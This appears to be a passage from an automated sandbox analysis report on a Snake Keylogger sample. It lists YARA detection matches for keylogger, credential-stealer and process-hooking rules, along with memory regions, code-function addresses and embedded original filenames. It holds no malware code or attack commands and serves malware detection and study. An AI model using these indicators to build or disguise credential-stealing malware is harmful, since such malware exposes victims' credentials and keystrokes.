Source: 0.2.ZTEIhNCtP3.exe.3975420.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.ZTEIhNCtP3.exe.41e3440.2.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.ZTEIhNCtP3.exe.3975420.1.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 8.2.HgKRLOctZksk.exe.3c45e40.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 8.2.HgKRLOctZksk.exe.3c45e40.1.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 8.2.HgKRLOctZksk.exe.3c45e40.1.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.ZTEIhNCtP3.exe.41e3440.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.ZTEIhNCtP3.exe.41e3440.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0.2.ZTEIhNCtP3.exe.41e3440.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 00000007.00000002.3342384845.000000000042F000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000000.00000002.909326738.0000000003975000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000000.00000002.909326738.00000000041E3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000008.00000002.944100988.0000000003C45000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: ZTEIhNCtP3.exe PID: 6164, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: ZTEIhNCtP3.exe PID: 6992, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: HgKRLOctZksk.exe PID: 5404, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown

Source: C:\Windows\System32\svchost.exe

File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe	Code function: 0_2_00D5DDAC	0_2_00D5DDAC
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe	Code function: 0_2_07068620	0_2_07068620
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe	Code function: 0_2_070666D8	0_2_070666D8
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe	Code function: 0_2_0706C490	0_2_0706C490
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe	Code function: 0_2_07067380	0_2_07067380
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe	Code function: 0_2_07066F39	0_2_07066F39
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe	Code function: 0_2_07066F48	0_2_07066F48
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe	Code function: 0_2_07066B10	0_2_07066B10
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe	Code function: 0_2_08451958	0_2_08451958
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe	Code function: 0_2_08459EBE	0_2_08459EBE
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe	Code function: 0_2_0845E378	0_2_0845E378
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe	Code function: 0_2_08453A8F	0_2_08453A8F
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe	Code function: 0_2_08457478	0_2_08457478
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe	Code function: 7_2_02CBD278	7_2_02CBD278
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe	Code function: 7_2_02CB5378	7_2_02CB5378
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe	Code function: 7_2_02CBC148	7_2_02CBC148
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe	Code function: 7_2_02CB7120	7_2_02CB7120
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe	Code function: 7_2_02CBC738	7_2_02CBC738
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe	Code function: 7_2_02CBC468	7_2_02CBC468
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe	Code function: 7_2_02CBCA08	7_2_02CBCA08
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe	Code function: 7_2_02CBE988	7_2_02CBE988
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe	Code function: 7_2_02CB69B8	7_2_02CB69B8
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe	Code function: 7_2_02CBCFAA	7_2_02CBCFAA
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe	Code function: 7_2_02CBCCD8	7_2_02CBCCD8
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe	Code function: 7_2_02CB9DE0	7_2_02CB9DE0
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe	Code function: 7_2_02CB3AC3	7_2_02CB3AC3
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe	Code function: 7_2_02CB3A27	7_2_02CB3A27
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe	Code function: 7_2_02CB3B67	7_2_02CB3B67
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe	Code function: 7_2_02CB3B0F	7_2_02CB3B0F
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe	Code function: 7_2_02CBF961	7_2_02CBF961
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe	Code function: 7_2_02CBE97A	7_2_02CBE97A
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe	Code function: 7_2_02CBF970	7_2_02CBF970
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe	Code function: 7_2_02CB3E18	7_2_02CB3E18
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe	Code function: 7_2_05839D38	7_2_05839D38
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe	Code function: 7_2_05839668	7_2_05839668
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe	Code function: 7_2_05835148	7_2_05835148
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe	Code function: 7_2_0583CDAF	7_2_0583CDAF
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe	Code function: 7_2_0583CDC0	7_2_0583CDC0
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe	Code function: 7_2_05838CB1	7_2_05838CB1
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe	Code function: 7_2_05838CC0	7_2_05838CC0
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe	Code function: 7_2_0583F4C8	7_2_0583F4C8
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe	Code function: 7_2_0583F4D8	7_2_0583F4D8
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe	Code function: 7_2_0583EC18	7_2_0583EC18
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe	Code function: 7_2_0583EC28	7_2_0583EC28
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe	Code function: 7_2_05831F9C	7_2_05831F9C
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe	Code function: 7_2_05831FA8	7_2_05831FA8
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe	Code function: 7_2_0583E7CF	7_2_0583E7CF
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe	Code function: 7_2_0583E7D0	7_2_0583E7D0
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe	Code function: 7_2_0583DF1F	7_2_0583DF1F
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe	Code function: 7_2_0583DF20	7_2_0583DF20
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe	Code function: 7_2_0583D660	7_2_0583D660
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe	Code function: 7_2_0583D670	7_2_0583D670
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe	Code function: 7_2_0583F921	7_2_0583F921
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe	Code function: 7_2_0583F930	7_2_0583F930
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe	Code function: 7_2_05835138	7_2_05835138
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe	Code function: 7_2_0583F080	7_2_0583F080
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe	Code function: 7_2_05830013	7_2_05830013
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe	Code function: 7_2_05831841	7_2_05831841
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe	Code function: 7_2_05830040	7_2_05830040
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe	Code function: 7_2_05831850	7_2_05831850
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe	Code function: 7_2_0583F071	7_2_0583F071
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe	Code function: 7_2_05830B20	7_2_05830B20
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe	Code function: 7_2_05830B30	7_2_05830B30
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe	Code function: 7_2_0583E369	7_2_0583E369
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe	Code function: 7_2_0583E378	7_2_0583E378
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe	Code function: 7_2_05832A90	7_2_05832A90
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe	Code function: 7_2_0583DAB9	7_2_0583DAB9
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe	Code function: 7_2_0583DAC8	7_2_0583DAC8
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe	Code function: 7_2_0583D218	7_2_0583D218
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Code function: 8_2_0502DDAC	8_2_0502DDAC
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Code function: 8_2_07139EBE	8_2_07139EBE
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Code function: 8_2_07131958	8_2_07131958
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Code function: 8_2_07137478	8_2_07137478
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Code function: 8_2_07133A8F	8_2_07133A8F
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Code function: 8_2_0756B6E0	8_2_0756B6E0
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Code function: 8_2_07561CF8	8_2_07561CF8
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Code function: 8_2_07568620	8_2_07568620
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Code function: 8_2_075666D8	8_2_075666D8
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Code function: 8_2_07567380	8_2_07567380
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Code function: 8_2_07566F48	8_2_07566F48
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Code function: 8_2_07566B10	8_2_07566B10
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Code function: 12_2_0174C147	12_2_0174C147
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Code function: 12_2_01747120	12_2_01747120
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Code function: 12_2_0174A088	12_2_0174A088
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Code function: 12_2_01745378	12_2_01745378
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Code function: 12_2_0174D278	12_2_0174D278
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Code function: 12_2_0174C468	12_2_0174C468
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Code function: 12_2_0174C738	12_2_0174C738
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Code function: 12_2_0174394B	12_2_0174394B
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Code function: 12_2_017469A8	12_2_017469A8
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Code function: 12_2_0174E988	12_2_0174E988
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Code function: 12_2_0174CA08	12_2_0174CA08
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Code function: 12_2_0174CCD8	12_2_0174CCD8
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Code function: 12_2_0174CFAB	12_2_0174CFAB
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Code function: 12_2_0174E97B	12_2_0174E97B
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Code function: 12_2_0174F961	12_2_0174F961
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Code function: 12_2_01743E09	12_2_01743E09
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Code function: 12_2_07021FA8	12_2_07021FA8
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Code function: 12_2_07029668	12_2_07029668
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Code function: 12_2_07022A90	12_2_07022A90
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Code function: 12_2_07025148	12_2_07025148
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Code function: 12_2_07029D90	12_2_07029D90
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Code function: 12_2_07021850	12_2_07021850
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Code function: 12_2_0702DF1F	12_2_0702DF1F
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Code function: 12_2_0702DF20	12_2_0702DF20
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Code function: 12_2_07020B20	12_2_07020B20
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Code function: 12_2_07020B30	12_2_07020B30
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Code function: 12_2_0702E36B	12_2_0702E36B
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Code function: 12_2_0702E378	12_2_0702E378
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Code function: 12_2_07021FA3	12_2_07021FA3
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Code function: 12_2_0702E7CF	12_2_0702E7CF
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Code function: 12_2_0702E7D0	12_2_0702E7D0
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Code function: 12_2_0702D218	12_2_0702D218
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Code function: 12_2_0702D660	12_2_0702D660
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Code function: 12_2_0702D670	12_2_0702D670
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Code function: 12_2_0702DAB9	12_2_0702DAB9
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Code function: 12_2_0702DAC8	12_2_0702DAC8
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Code function: 12_2_0702F923	12_2_0702F923
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Code function: 12_2_07029D29	12_2_07029D29
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Code function: 12_2_0702F930	12_2_0702F930
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Code function: 12_2_07025138	12_2_07025138
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Code function: 12_2_0702CDC0	12_2_0702CDC0
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Code function: 12_2_07020006	12_2_07020006
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Code function: 12_2_0702EC18	12_2_0702EC18
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Code function: 12_2_0702EC28	12_2_0702EC28
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Code function: 12_2_07020040	12_2_07020040
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Code function: 12_2_07021841	12_2_07021841
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Code function: 12_2_07029448	12_2_07029448
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Code function: 12_2_0702F071	12_2_0702F071
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Code function: 12_2_0702F080	12_2_0702F080
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Code function: 12_2_07028CB1	12_2_07028CB1
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Code function: 12_2_07028CC0	12_2_07028CC0
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Code function: 12_2_0702F4D8	12_2_0702F4D8

Source: ZTEIhNCtP3.exe

Static PE information: invalid certificate

Source: ZTEIhNCtP3.exe, 00000000.00000002.909326738.00000000041E3000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameAubriella.exe4 vs ZTEIhNCtP3.exe
Source: ZTEIhNCtP3.exe, 00000000.00000002.911162651.0000000006CA0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameTL.dll" vs ZTEIhNCtP3.exe
Source: ZTEIhNCtP3.exe, 00000000.00000002.911448125.0000000006FD0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameMontero.dll8 vs ZTEIhNCtP3.exe
Source: ZTEIhNCtP3.exe, 00000000.00000002.910911978.0000000006C20000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamepWWf.exe4 vs ZTEIhNCtP3.exe
Source: ZTEIhNCtP3.exe, 00000000.00000002.909326738.0000000003975000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameAubriella.exe4 vs ZTEIhNCtP3.exe
Source: ZTEIhNCtP3.exe, 00000000.00000000.863840800.000000000043E000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenamepWWf.exe4 vs ZTEIhNCtP3.exe
Source: ZTEIhNCtP3.exe, 00000000.00000002.905766839.0000000000AAE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs ZTEIhNCtP3.exe
Source: ZTEIhNCtP3.exe, 00000000.00000002.907804109.00000000029AA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameAubriella.exe4 vs ZTEIhNCtP3.exe
Source: ZTEIhNCtP3.exe, 00000000.00000002.907804109.0000000002A02000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameTL.dll" vs ZTEIhNCtP3.exe
Source: ZTEIhNCtP3.exe, 00000007.00000002.3343573382.0000000000EF7000.00000004.00000010.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameUNKNOWN_FILET vs ZTEIhNCtP3.exe
Source: ZTEIhNCtP3.exe	Binary or memory string: OriginalFilenamepWWf.exe4 vs ZTEIhNCtP3.exe

Source: ZTEIhNCtP3.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 7.2.ZTEIhNCtP3.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 7.2.ZTEIhNCtP3.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 7.2.ZTEIhNCtP3.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 8.2.HgKRLOctZksk.exe.3c45e40.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 8.2.HgKRLOctZksk.exe.3c45e40.1.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.ZTEIhNCtP3.exe.41e3440.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.ZTEIhNCtP3.exe.3975420.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.ZTEIhNCtP3.exe.3975420.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 8.2.HgKRLOctZksk.exe.3c45e40.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.ZTEIhNCtP3.exe.41e3440.2.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.ZTEIhNCtP3.exe.3975420.1.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.ZTEIhNCtP3.exe.3975420.1.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.ZTEIhNCtP3.exe.3975420.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.ZTEIhNCtP3.exe.41e3440.2.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.ZTEIhNCtP3.exe.3975420.1.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 8.2.HgKRLOctZksk.exe.3c45e40.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 8.2.HgKRLOctZksk.exe.3c45e40.1.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 8.2.HgKRLOctZksk.exe.3c45e40.1.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.ZTEIhNCtP3.exe.41e3440.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.ZTEIhNCtP3.exe.41e3440.2.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.ZTEIhNCtP3.exe.41e3440.2.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 00000007.00000002.3342384845.000000000042F000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000000.00000002.909326738.0000000003975000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
